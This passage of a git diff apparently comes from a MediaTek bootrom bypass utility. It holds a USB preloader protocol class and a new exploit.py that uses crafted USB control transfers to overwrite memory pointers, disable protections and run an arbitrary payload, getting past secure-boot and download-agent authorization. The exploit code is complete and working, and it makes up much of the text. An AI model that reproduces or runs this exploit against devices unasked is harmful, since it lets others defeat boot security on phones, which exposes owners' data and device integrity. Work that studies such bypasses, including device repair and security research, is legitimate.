self.udev.detach_kernel_driver(0) + + if self.udev.is_kernel_driver_active(1): + self.udev.detach_kernel_driver(1) + + except (NotImplementedError, usb.core.USBError): + pass + + try: + self.configuration = self.udev.get_active_configuration() + except (usb.core.USBError, NotImplementedError) as e: + if type(e) is usb.core.USBError and e.errno == 13 or type(e) is NotImplementedError: + log("Failed to enable libusb1, is UsbDk installed?") + log("Falling back to libusb0 (kamakiri only)") + self.backend = usb.backend.libusb0.get_backend() + self.udev = usb.core.find(idVendor=int(VID, 16), backend=self.backend) + self.libusb0 = True + try: + self.udev.set_configuration() + except AttributeError: + log("Failed to enable libusb0") + exit(1) + + if self.udev.idProduct != int(PID, 16): + self.preloader = True + else: + try: + self.udev.set_configuration(1) + usb.util.claim_interface(self.udev, 0) + usb.util.claim_interface(self.udev, 1) + except usb.core.USBError: + pass + + cdc_if = usb.util.find_descriptor(self.udev.get_active_configuration(), bInterfaceClass=0xA) + self.ep_in = usb.util.find_descriptor(cdc_if, custom_match=lambda x: usb.util.endpoint_direction(x.bEndpointAddress) == usb.util.ENDPOINT_IN) + self.ep_out = usb.util.find_descriptor(cdc_if, custom_match=lambda x: usb.util.endpoint_direction(x.bEndpointAddress) == usb.util.ENDPOINT_OUT) + + try: + self.udev.ctrl_transfer(0x21, 0x20, 0, 0, array.array('B', to_bytes(BAUD, 4 , '<') + b"\x00\x00\x08")) + except usb.core.USBError: + pass + + return self + + @staticmethod + def check(test, gold): + if test != gold: + if type(test) == bytes: + test = "0x" + test.hex() + else: + test = hex(test) + + if type(gold) == bytes: + gold = "0x" + gold.hex() + else: + gold = hex(gold) + + raise RuntimeError("Unexpected output, expected {} got {}".format(gold, test)) + + def close(self): + self.dev = None + self.rxbuffer = array.array('B') + try: + usb.util.release_interface(self.udev, 0) + usb.util.release_interface(self.udev, 1) + except Exception: + pass + if not self.usbdk: + try: + self.udev.reset() + except Exception: + pass + try: + self.udev.attach_kernel_driver(0) + except Exception: + pass + try: + self.udev.attach_kernel_driver(1) + except Exception: + pass + if not self.usbdk: + try: + usb.util.dispose_resources(self.udev) + except Exception: + pass + self.udev = None + time.sleep(1) + + def handshake(self): + sequence = b"\xA0\x0A\x50\x05" + i = 0 + while i < len(sequence): + self.write(sequence[i]) + reply = self.read(1) + if reply and reply[0] == ~sequence[i] & 0xFF: + i += 1 + else: + i = 0 + + def echo(self, words, size=1): + self.write(words, size) + self.check(from_bytes(self.read(size), size), words) + + def read(self, size=1): + offset = 0 + data = b"" + while len(self.rxbuffer) < size: + try: + self.rxbuffer.extend(self.ep_in.read(self.ep_in.wMaxPacketSize, self.timeout * 1000)) + except usb.core.USBError as e: + if e.errno == 110: + self.udev.reset() + break + if size <= len(self.rxbuffer): + result = self.rxbuffer[:size] + self.rxbuffer = self.rxbuffer[size:] + else: + result = self.rxbuffer + self.rxbuffer = array.array('B') + return bytes(result) + + def read32(self, addr, size=1): + result = [] + + self.echo(0xD1) + self.echo(addr, 4) + self.echo(size, 4) + + status = self.dev.read(2) + if from_bytes(status, 2) > 0xff: + raise RuntimeError("status is {}".format(status.hex())) + + for _ in range(size): + data = from_bytes(self.dev.read(4), 4) + result.append(data) + + status = self.dev.read(2) + if from_bytes(status, 2) > 0xff: + raise RuntimeError("status is {}".format(status.hex())) + + # support scalar + if len(result) == 1: + return result[0] + else: + return result + + def write(self, data, size=1): + if type(data) != bytes: + data = to_bytes(data, size) + offset = 0 + while offset < len(data): + self.ep_out.write(data[offset:][:self.ep_out.wMaxPacketSize if len(data) - offset > self.ep_out.wMaxPacketSize else len(data) - offset], self.timeout * 1000) + offset += self.ep_out.wMaxPacketSize + + def write32(self, addr, words, check_status=True): + # support scalar + if not isinstance(words, list): + words = [words] + + self.echo(0xD4) + self.echo(addr, 4) + self.echo(len(words), 4) + + self.check(self.dev.read(2), to_bytes(1, 2)) # arg check + + for word in words: + self.echo(word, 4) + + if check_status: + self.check(self.dev.read(2), to_bytes(1, 2)) # status + + def get_target_config(self): + self.echo(0xD8) + + target_config = self.dev.read(4) + status = self.dev.read(2) + + if from_bytes(status, 2) != 0: + raise RuntimeError("status is {}".format(status.hex())) + + target_config = from_bytes(target_config, 4) + + secure_boot = target_config & 1 + serial_link_authorization = target_config & 2 + download_agent_authorization = target_config & 4 + + # noinspection PyCallByClass + return bool(secure_boot), bool(serial_link_authorization), bool(download_agent_authorization) + + def get_hw_code(self): + self.echo(0xFD) + + hw_code = self.dev.read(2) + status = self.dev.read(2) + + if from_bytes(status, 2) != 0: + raise RuntimeError("status is {}".format(status.hex())) + + return from_bytes(hw_code, 2) + + def get_hw_dict(self): + self.echo(0xFC) + + hw_sub_code = self.dev.read(2) + hw_ver = self.dev.read(2) + sw_ver = self.dev.read(2) + status = self.dev.read(2) + + if from_bytes(status, 2) != 0: + raise RuntimeError("status is {}".format(status.hex())) + + return from_bytes(hw_sub_code, 2), from_bytes(hw_ver, 2), from_bytes(sw_ver, 2) + + def send_da(self, da_address, da_len, sig_len, da): + self.echo(0xD7) + + self.echo(da_address, 4) + self.echo(da_len, 4) + self.echo(sig_len, 4) + + status = self.dev.read(2) + + if from_bytes(status, 2) != 0: + raise RuntimeError("status is {}".format(status.hex())) + + self.dev.write(da) + + checksum = self.dev.read(2) + status = self.dev.read(2) + + if from_bytes(status, 2) != 0: + raise RuntimeError("status is {}".format(status.hex())) + + return from_bytes(checksum, 2) + + def jump_da(self, da_address): + self.echo(0xD5) + + self.echo(da_address, 4) + + status = self.dev.read(2) + + if from_bytes(status, 2) != 0: + raise RuntimeError("status is {}".format(status.hex())) + + def cmd_da(self, direction, offset, length, data=None, check_status = True): + self.echo(0xDA) + + self.echo(direction, 4) + self.echo(offset, 4) + self.echo(length, 4) + + status = self.dev.read(2) + + if from_bytes(status, 2) != 0: + raise RuntimeError("status is {}".format(status.hex())) + + if (direction & 1) == 1: + self.dev.write(data) + else: + data = self.dev.read(length) + + if check_status: + status = self.dev.read(2) + + if from_bytes(status, 2) != 0: + raise RuntimeError("status is {}".format(status.hex())) + + return data diff --git a/src/exploit.py b/src/exploit.py new file mode 100644 index 0000000000000000000000000000000000000000..e39ebea1c03cefff75c0e0961ea8445d88e0fd54 --- /dev/null +++ b/src/exploit.py @@ -0,0 +1,97 @@ +from src.common import to_bytes, from_bytes +from src.logger import log + +import usb +import array + + +def exploit(device, config, payload, arguments): + + def da_read(address, length, check_result = True): + return da_read_write(0, address, length, None, check_result) + + def da_write(address, length, data, check_result = True): + return da_read_write(1, address, length, data, check_result) + + def da_read_write(direction, address, length, data = None, check_result = True): + try: + device.cmd_da(0,0,1) + device.read32(addr) + except: + pass + + for i in range(3): + udev.ctrl_transfer(0x21, 0x20, 0, 0, linecode + array.array('B', to_bytes(config.ptr_da + 8 - 3 + i, 4, '<'))) + udev.ctrl_transfer(0x80, 0x6, 0x0200, 0, 9) + + if address < 0x40: + for i in range(4): + udev.ctrl_transfer(0x21, 0x20, 0, 0, linecode + array.array('B', to_bytes(config.ptr_da - 6 + (4 - i), 4, '<'))) + udev.ctrl_transfer(0x80, 0x6, 0x0200, 0, 9) + return device.cmd_da(direction, address, length, data, check_result) + else: + for i in range(3): + udev.ctrl_transfer(0x21, 0x20, 0, 0, linecode + array.array('B', to_bytes(config.ptr_da - 5 + (3 - i), 4, '<'))) + udev.ctrl_transfer(0x80, 0x6, 0x0200, 0, 9) + return device.cmd_da(direction, address - 0x40, length, data, check_result) + + + addr = config.watchdog_address + 0x50 + + if not config.ptr_usbdl or arguments.kamakiri: + log("Using kamakiri") + device.write32(addr, from_bytes(to_bytes(config.payload_address, 4), 4, '<')) + if config.var_0: + readl = config.var_0 + 0x4 + device.read32(addr - config.var_0, readl // 4) + else: + cnt = 15 + for i in range(cnt): + device.read32(addr - (cnt - i) * 4, cnt - i + 1) + + device.echo(0xE0) + + device.echo(len(payload), 4) + + status = device.read(2) + if from_bytes(status, 2) != 0: + raise RuntimeError("status is {}".format(status.hex())) + + device.write(payload) + + # clear 4 bytes + device.read(4) + + udev = device.udev + + try: + if not config.ptr_usbdl or arguments.kamakiri: + try: + # noinspection PyProtectedMember + udev._ctx.managed_claim_interface = lambda *args, **kwargs: None + except AttributeError as e: + raise RuntimeError("libusb is not installed for port {}".format(device.dev.port)) from e + udev.ctrl_transfer(0xA1, 0, 0, config.var_1, 0) + else: + linecode = udev.ctrl_transfer(0xA1, 0x21, 0, 0, 7) + array.array('B', [0]) + ptr_send = from_bytes(da_read(config.ptr_usbdl, 4), 4, '<') + 8; + da_write(config.payload_address, len(payload), payload) + da_write(ptr_send, 4, to_bytes(config.payload_address, 4, '<'), False) + + except usb.core.USBError as e: + print(e) + + # We don't need to wait long, if we succeeded + # noinspection PyBroadException + try: + device.dev.timeout = 1 + except Exception: + pass + + try: + pattern = device.read(4) + except usb.core.USBError as e: + print(e) + return False + + return pattern diff --git a/src/logger.py b/src/logger.py new file mode 100644 index 0000000000000000000000000000000000000000..43c2046275fb0975250c2684c1d022fee283795e --- /dev/null +++ b/src/logger.py @@ -0,0 +1,9 @@ +import datetime + + +def log(string): + line = "[{}] {}".format(datetime.datetime.now(), string) + print(line) + + with open("bypass_utility.log", "a") as out: + out.write(line + "\n")